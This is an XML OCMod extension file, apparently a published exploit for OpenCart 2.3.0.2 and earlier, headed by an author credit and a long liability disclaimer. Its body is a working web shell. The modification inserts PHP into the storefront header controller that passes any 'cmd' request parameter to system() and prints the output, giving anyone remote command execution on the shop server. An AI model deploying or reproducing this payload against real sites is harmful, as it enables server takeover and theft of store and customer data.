<?xml version="1.0" encoding="utf-8"?> <!-- Opencart <= 2.3.0.2 Insecure OCMod Generation Pre-Auth RCE --> <!-- Copyright 2019 (c) Todor Donev <todor.donev at gmail.com> --> <!-- Disclaimer: --> <!-- This or previous programs is for Educational --> <!-- purpose ONLY. Do not use it without permission. --> <!-- The usual disclaimer applies, especially the --> <!-- fact that Todor Donev is not liable for any --> <!-- damages caused by direct or indirect use of the --> <!-- information or functionality provided by these --> <!-- programs. The author or any Internet provider --> <!-- bears NO responsibility for content or misuse --> <!-- of these programs or any derivatives thereof. --> <!-- By using these programs you accept the fact --> <!-- that any damage (dataloss, system crash, --> <!-- system compromise, etc.) caused by the use --> <!-- of these programs is not Todor Donev's --> <!-- responsibility. --> <!-- Use them at your own risk! --> <!-- NOTES: This file must be - oc2302_preauth_rce.ocmod.xml --> <modification> <name><![CDATA[Opencart <= 2.3.0.2 Insecure OCMod Generation Pre-Auth RCE]]></name> <code><![CDATA[Opencart <= 2.3.0.2 Insecure OCMod Generation Pre-Auth RCE]]></code> <version>1.0</version> <author>Todor Donev</author> <link>mailto:todor.donev@gmail.com</link> <file path="catalog/controller/common/header.php"> <operation> <search><![CDATA[// For page specific css]]></search> <add position="before"><![CDATA[ if(isset($this->request->get['cmd'])){ echo "<pre>"; $cmd = ($this->request->get['cmd']); system($cmd); echo "</pre>"; }]]></add> </operation> </file> </modification>